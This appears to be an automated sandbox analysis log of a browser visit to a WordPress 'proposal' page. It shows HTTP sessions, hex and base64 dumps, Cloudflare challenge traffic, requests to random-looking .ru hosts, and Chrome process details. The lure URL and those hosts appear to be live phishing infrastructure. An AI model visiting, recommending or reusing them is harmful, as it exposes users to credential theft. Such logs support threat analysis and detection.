                                                                                                                                                                                                                                                2024-12-20 15:46:24 UTC16384OUTData Raw: 78 4d 35 65 54 49 2b 42 54 70 48 79 64 74 35 6b 30 42 4d 52 47 56 42 35 56 65 65 37 59 58 79 63 49 42 2b 46 7a 49 37 49 6a 79 42 30 49 55 36 32 56 53 33 49 4e 38 6e 79 49 53 65 65 65 4d 65 4f 5a 49 4d 65 37 65 53 79 65 62 65 36 6b 46 58 65 74 65 30 4f 42 6f 58 7a 65 36 39 65 34 65 69 77 52 56 53 32 79 35 49 37 56 46 4d 65 57 58 6c 66 52 77 65 6e 65 52 49 53 53 65 6a 51 52 79 53 38 65 24 49 36 69 65 47 65 74 49 52 69 65 68 49 53 78 65 69 53 6a 65 67 49 42 58 46 5a 65 72 4c 43 35 37 47 65 55 36 6a 65 6f 56 48 6e 47 30 4f 42 55 36 5a 65 37 49 65 2d 65 48 69 32 49 42 6f 58 77 49 36 59 65 2d 65 37 69 6e 49 6f 6a 65 70 2d 6a 65 46 62 65 47 71 53 49 65 72 49 47 56 4f 65 53 35 68 33 56 32 56 53 66 65 6e 6b 30 4f 53 7a 65 38 35 6f 65 2d 39 56 74 44 37 53 46 62 65
                                                                                                                                                                                                                                                Data Ascii: xM5eTI+BTpHydt5k0BMRGVB5Vee7YXycIB+FzI7IjyB0IU62VS3IN8nyISeeeMeOZIMe7eSyebe6kFXete0OBoXze69e4eiwRVS2y5I7VFMeWXlfRweneRISSejQRyS8e$I6ieGetIRiehISxeiSjegIBXFZerLC57GeU6jeoVHnG0OBU6Ze7Ie-eHi2IBoXwI6Ye-e7inIojep-jeFbeGqSIerIGVOeS5h3V2VSfenk0OSze85oe-9VtD7SFbe
                                                                                                                                                                                                                                                2024-12-20 15:46:24 UTC987OUTData Raw: 6b 6f 62 32 4d 2d 4b 56 42 38 42 6a 65 58 65 77 4f 68 2d 49 65 78 54 49 62 30 56 4d 55 6b 49 6a 55 69 66 75 44 32 36 55 47 4f 4b 63 41 6a 58 65 61 49 52 55 79 79 41 52 49 32 55 76 4b 4b 65 44 67 52 47 39 4b 58 44 39 4f 45 63 4b 75 74 4e 4f 45 4a 6b 52 49 52 69 76 53 65 2b 49 36 4f 68 7a 65 61 65 79 57 77 69 67 73 65 37 48 36 30 65 36 79 7a 33 47 53 65 5a 49 6f 69 46 71 46 79 65 6f 65 35 73 65 72 6b 51 55 76 4e 31 2d 49 61 79 6c 30 4b 69 49 31 72 34 24 4b 66 54 77 4a 42 5a 4b 45 58 46 33 6b 4b 65 6a 6f 46 65 53 66 4b 46 54 48 77 42 79 65 56 49 30 54 4c 4a 24 72 55 71 43 46 58 79 5a 79 6a 44 53 24 2d 59 34 32 58 71 69 42 63 75 54 66 32 39 79 45 6b 51 45 56 41 43 50 6b 7a 70 36 79 65 76 6b 2b 61 65 4c 43 44 48 30 4d 46 4c 43 43 6b 57 4b 6c 72 43 4f 6b 4c 34
                                                                                                                                                                                                                                                Data Ascii: kob2M-KVB8BjeXewOh-IexTIb0VMUkIjUifuD26UGOKcAjXeaIRUyyARI2UvKKeDgRG9KXD9OEcKutNOEJkRIRivSe+I6OhzeaeyWwigse7H60e6yz3GSeZIoiFqFyeoe5serkQUvN1-Iayl0KiI1r4$KfTwJBZKEXF3kKejoFeSfKFTHwByeVI0TLJ$rUqCFXyZyjDS$-Y42XqiBcuTf29yEkQEVACPkzp6yevk+aeLCDH0MFLCCkWKlrCOkL4
                                                                                                                                                                                                                                                2024-12-20 15:46:24 UTC286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:24 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 4544
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-chl-out: TWLRABu8ZhaekLzEID6mGdoU66gh2Qvgjs/F0bl9I9vfDOYI7bAtLwP1hkSWGBtyObJV1aNRVYk+Eo1KzwdXGuQBuHo+B+DqeXI6enhdVqxj0F3B/vZ7Ucs=$WNeTTLKnGBcqVHoe
                                                                                                                                                                                                                                                2024-12-20 15:46:24 UTC1259INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 65 52 54 71 70 45 4b 49 51 53 72 67 72 75 2f 38 38 32 66 30 4b 62 35 4c 6b 78 37 6a 71 74 56 56 6c 6f 65 68 59 54 39 68 56 53 56 6c 6a 52 51 61 4c 37 48 48 78 78 6b 79 2b 30 42 4f 4c 4f 4b 4d 53 78 7a 4a 66 52 37 58 62 76 77 49 4d 46 6c 5a 62 6c 2b 63 6b 47 47 73 46 34 48 78 75 31 61 50 46 38 4d 6e 69 6b 44 72 67 6a 55 69 5a 44 68 67 58 53 61 51 6a 65 56 41 6d 6b 52 70 70 79 47 42 79 47 51 72 69 6c 43 37 6e 67 57 58 77 57 39 6e 2f 67 61 6a 4e 2b 41 52 55 74 78 6a 52 66 59 54 31 35 34 76 4a 50 6e 7a 72 76 6e 48 63 54 38 77 5a 75 57 63 32 67 6e 37 76 39 46 67 32 45 67 63 4e 59 41 61 41 79 44 4b 48 4a 6c 2b 45 58 6c 30 76 5a 4d 51 4d 4b 6d 33 6f 36 6d 36 36 44 30 2b 5a 33 2f 4d 49 54 43 7a 4e 61 56 69 4e 50 79 77 41
                                                                                                                                                                                                                                                Data Ascii: cf-chl-out-s: eRTqpEKIQSrgru/882f0Kb5Lkx7jqtVVloehYT9hVSVljRQaL7HHxxky+0BOLOKMSxzJfR7XbvwIMFlZbl+ckGGsF4Hxu1aPF8MnikDrgjUiZDhgXSaQjeVAmkRppyGByGQrilC7ngWXwW9n/gajN+ARUtxjRfYT154vJPnzrvnHcT8wZuWc2gn7v9Fg2EgcNYAaAyDKHJl+EXl0vZMQMKm3o6m66D0+Z3/MITCzNaViNPywA
                                                                                                                                                                                                                                                2024-12-20 15:46:24 UTC1193INData Raw: 77 63 71 64 69 72 32 49 71 4c 66 45 6a 62 43 39 77 35 2b 68 32 4b 37 55 75 61 61 55 73 62 32 33 6d 63 71 59 31 37 2b 74 72 2b 50 51 70 4c 54 4b 33 4d 44 68 32 63 37 77 30 36 7a 6a 36 75 32 33 35 2b 37 78 2b 4f 61 34 33 37 6a 68 75 76 33 56 33 67 54 66 2b 76 58 58 32 77 66 31 32 38 72 50 2f 67 62 4b 38 77 2f 50 35 67 4c 68 47 65 72 35 36 75 62 73 48 43 48 63 46 42 58 6b 2b 78 67 6f 35 39 73 47 48 4f 51 43 4c 77 62 75 48 77 59 6d 38 7a 55 4f 4c 76 59 51 46 6a 6a 38 46 52 59 61 4f 69 42 42 47 42 45 65 52 53 41 57 4e 67 59 61 47 52 63 58 47 68 6f 61 4f 31 4a 46 55 45 31 4b 4b 53 55 6e 53 69 38 34 46 52 64 69 57 31 55 57 55 6c 52 45 53 47 4d 70 53 53 6c 71 57 45 55 76 55 54 35 78 4d 6b 64 32 5a 6c 52 52 52 46 64 70 4f 30 64 39 4e 30 31 66 67 48 70 50 67 7a 39
                                                                                                                                                                                                                                                Data Ascii: wcqdir2IqLfEjbC9w5+h2K7UuaaUsb23mcqY17+tr+PQpLTK3MDh2c7w06zj6u235+7x+Oa437jhuv3V3gTf+vXX2wf128rP/gbK8w/P5gLhGer56ubsHCHcFBXk+xgo59sGHOQCLwbuHwYm8zUOLvYQFjj8FRYaOiBBGBEeRSAWNgYaGRcXGhoaO1JFUE1KKSUnSi84FRdiW1UWUlRESGMpSSlqWEUvUT5xMkd2ZlRRRFdpO0d9N01fgHpPgz9
                                                                                                                                                                                                                                                2024-12-20 15:46:24 UTC1369INData Raw: 53 6c 4c 44 53 64 4e 50 55 6b 4c 52 55 74 51 4b 31 56 57 55 55 70 61 56 53 39 57 59 46 73 30 4e 54 6f 65 58 56 49 64 55 31 45 30 61 6c 59 2f 5a 53 64 61 55 45 74 7a 63 57 31 41 4d 48 68 6a 4f 6e 70 6e 64 6c 74 2f 67 45 42 4e 58 48 6c 46 5a 58 4a 42 53 57 46 54 51 33 5a 72 51 59 70 37 66 32 70 4d 6b 45 2b 50 6b 32 31 74 59 35 5a 77 57 49 75 66 57 33 42 62 6e 47 4e 66 70 4b 68 39 6f 70 2b 74 6a 48 79 6e 5a 35 70 76 63 61 32 77 63 37 61 31 64 35 6d 58 76 61 65 2f 69 38 47 37 72 63 44 45 76 61 43 30 77 49 61 36 77 72 65 31 6e 5a 6a 4c 73 4a 7a 46 79 73 71 30 31 38 4f 72 73 63 66 62 31 64 2b 36 6c 36 43 76 34 63 32 69 70 70 2b 67 76 64 62 6c 36 65 6a 44 37 2b 6a 61 73 4d 76 74 74 4b 2f 76 39 66 48 49 2b 4c 54 50 78 2f 66 71 31 4e 2b 31 76 63 53 38 33 41 48 62
                                                                                                                                                                                                                                                Data Ascii: SlLDSdNPUkLRUtQK1VWUUpaVS9WYFs0NToeXVIdU1E0alY/ZSdaUEtzcW1AMHhjOnpndlt/gEBNXHlFZXJBSWFTQ3ZrQYp7f2pMkE+Pk21tY5ZwWIufW3BbnGNfpKh9op+tjHynZ5pvca2wc7a1d5mXvae/i8G7rcDEvaC0wIa6wre1nZjLsJzFysq018Orscfb1d+6l6Cv4c2ipp+gvdbl6ejD7+jasMvttK/v9fHI+LTPx/fq1N+1vcS83AHb
                                                                                                                                                                                                                                                2024-12-20 15:46:24 UTC1369INData Raw: 34 4a 4e 46 51 6d 53 42 63 6c 45 52 55 33 46 68 59 35 4c 52 64 52 56 43 46 62 59 68 30 76 4f 6c 45 37 61 6c 68 63 4f 45 31 6e 62 58 42 53 61 55 67 7a 62 46 52 56 55 57 5a 39 53 55 64 67 54 6e 56 58 50 47 38 2f 66 58 56 78 51 31 64 46 64 31 74 72 6a 59 78 67 63 31 46 2f 5a 49 46 52 67 6d 69 4e 6d 34 5a 76 63 47 2b 59 66 33 56 31 6a 48 61 67 68 33 36 66 65 57 74 70 61 70 36 4f 72 71 47 4f 72 34 53 30 64 6f 75 4f 75 5a 4f 6a 6a 59 65 6f 74 35 4b 4d 72 59 2b 56 65 38 53 37 67 63 4f 58 79 33 36 61 71 71 6d 4a 6e 4b 48 54 78 5a 47 54 73 63 71 70 31 72 4c 51 72 63 71 2f 34 4e 57 74 73 64 54 58 72 38 69 32 32 64 32 6a 34 71 76 69 33 4e 48 52 71 75 66 6e 36 2f 58 79 37 50 43 36 74 50 4c 78 31 4e 66 75 39 39 6a 30 38 75 54 47 76 76 7a 59 41 76 30 4a 33 63 63 42 38
                                                                                                                                                                                                                                                Data Ascii: 4JNFQmSBclERU3FhY5LRdRVCFbYh0vOlE7alhcOE1nbXBSaUgzbFRVUWZ9SUdgTnVXPG8/fXVxQ1dFd1trjYxgc1F/ZIFRgmiNm4ZvcG+Yf3V1jHagh36feWtpap6OrqGOr4S0douOuZOjjYeot5KMrY+Ve8S7gcOXy36aqqmJnKHTxZGTscqp1rLQrcq/4NWtsdTXr8i22d2j4qvi3NHRqufn6/Xy7PC6tPLx1Nfu99j08uTGvvzYAv0J3ccB8
                                                                                                                                                                                                                                                2024-12-20 15:46:24 UTC613INData Raw: 4f 55 54 41 70 55 6b 55 6f 57 56 5a 58 51 46 42 53 4e 32 45 67 57 7a 6c 70 49 56 6b 6d 56 6a 70 62 4b 7a 74 6c 59 57 31 31 4d 6d 45 31 52 45 64 79 4f 45 63 2f 65 56 49 30 62 47 56 55 50 33 70 38 57 6e 4a 38 64 6c 78 36 67 33 47 49 68 6d 39 30 5a 6b 35 4f 68 48 68 6e 6d 34 64 39 65 49 32 4c 63 4a 71 4f 6d 47 4b 44 5a 4a 4a 35 63 35 79 61 66 6f 75 64 6e 6e 39 37 63 61 47 57 63 36 57 59 6d 5a 65 34 70 58 71 50 66 71 32 32 65 73 47 6b 6c 49 2b 41 74 61 69 59 6c 72 6d 62 68 36 2f 45 6e 36 69 78 79 4b 50 53 71 62 6a 50 6f 38 2f 52 72 4d 61 7a 30 37 4c 4b 31 39 65 68 33 74 66 58 75 4d 6a 54 32 71 6a 49 7a 64 72 43 30 4b 2f 70 73 66 4c 6d 37 39 72 70 36 4f 69 34 33 37 62 73 30 50 47 39 2f 4c 37 59 38 76 4c 5a 36 2f 72 2b 41 75 76 4f 38 41 73 47 79 77 44 39 33 78
                                                                                                                                                                                                                                                Data Ascii: OUTApUkUoWVZXQFBSN2EgWzlpIVkmVjpbKztlYW11MmE1REdyOEc/eVI0bGVUP3p8WnJ8dlx6g3GIhm90Zk5OhHhnm4d9eI2LcJqOmGKDZJJ5c5yafoudnn97caGWc6WYmZe4pXqPfq22esGklI+AtaiYlrmbh6/En6ixyKPSqbjPo8/RrMaz07LK19eh3tfXuMjT2qjIzdrC0K/psfLm79rp6Oi437bs0PG9/L7Y8vLZ6/r+AuvO8AsGywD93x


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                73192.168.2.1149946104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:25 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/754265710:1734707715:oBMT5532Ii6sPNFHOfKD9tGFk1HjF6gPP9GcopH_rJw/8f50c3606cea43b9/2dqSYWK0Dd5nXPHgk9S1pzxDycBFfDqXb6x9mdxK90c-1734709565-1.1.1.1-yzCAYJr.4lhCJtr.2hHLhx9zHosqDbEA0AI8gSibNVVtpRjzXyrmk_Bja6dIoTRH HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:26 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:26 GMT
                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-chl-out: 00rTIt+hhEn9yhzsnIxUwCRhsvWziWSVuQY=$3c7zozmNweKB2msY
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c3e21c130fa5-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:26 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                74192.168.2.1149954104.21.73.564436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:27 UTC651OUTGET /occxEbMsaASlqNVkWEqyWydNFGHLKDHUVJNWWLPPADVXYAQO HTTP/1.1
                                                                                                                                                                                                                                                Host: gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://oksu.ertanduzu.ru
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://oksu.ertanduzu.ru/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:28 UTC902INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:28 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2ZscICAav3%2BWAU8DE9S24zfcz8CYEWyUjrMWK07%2F9QbOBtXR1P3QaAWp6Bji4vOYwMq82usGZJj94WcK9lHlPC7z4TQbXqfNpkkGIlp74wRVE81UWt0YZzPxMtyTT5AhKJjJuLdH2%2B2sW5kysjE6KmvZnPGeeYjbseh2F5BW0PNd%2FWVoxymi6QQAWEDAghcCaCjR5KOl82i%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c3ec7d5b4338-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1608&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1229&delivery_rate=1815920&cwnd=193&unsent_bytes=0&cid=0556de12fe09800f&ts=970&x=0"
                                                                                                                                                                                                                                                2024-12-20 15:46:28 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 11
                                                                                                                                                                                                                                                2024-12-20 15:46:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                75192.168.2.1149966104.21.73.564436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:31 UTC443OUTGET /occxEbMsaASlqNVkWEqyWydNFGHLKDHUVJNWWLPPADVXYAQO HTTP/1.1
                                                                                                                                                                                                                                                Host: gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:32 UTC905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJcwSqqRCqwdZYZo%2BNTNU%2B4CEJ88vgDZal8reUhuyUDXz97nRkLJ8IVx3SyY6rH0j5t%2FRP8H1imhW2Ngp2STIKtuWbWno%2FU5lF0oJOV50gaKn%2BqXYQiI3EMviNqm4vTTY9GBq0zuKiSQRoq7PcyzvUAGC0mVjxMchc07HwwBcafxw2b3fK5mvDqybGbUEvxrq3MvbxAx%2FhaKRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c402fc4b8cb1-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1781&rtt_var=687&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1021&delivery_rate=1570736&cwnd=186&unsent_bytes=0&cid=c0d9622cfca86693&ts=1134&x=0"
                                                                                                                                                                                                                                                2024-12-20 15:46:32 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 11
                                                                                                                                                                                                                                                2024-12-20 15:46:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:10:45:17
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                Imagebase:0x7ff6a3150000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                Start time:10:45:20
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2232,i,223269559508194267,12373527596569919649,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                Imagebase:0x7ff6a3150000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                Start time:10:45:27
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/"
                                                                                                                                                                                                                                                Imagebase:0x7ff6a3150000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                No disassembly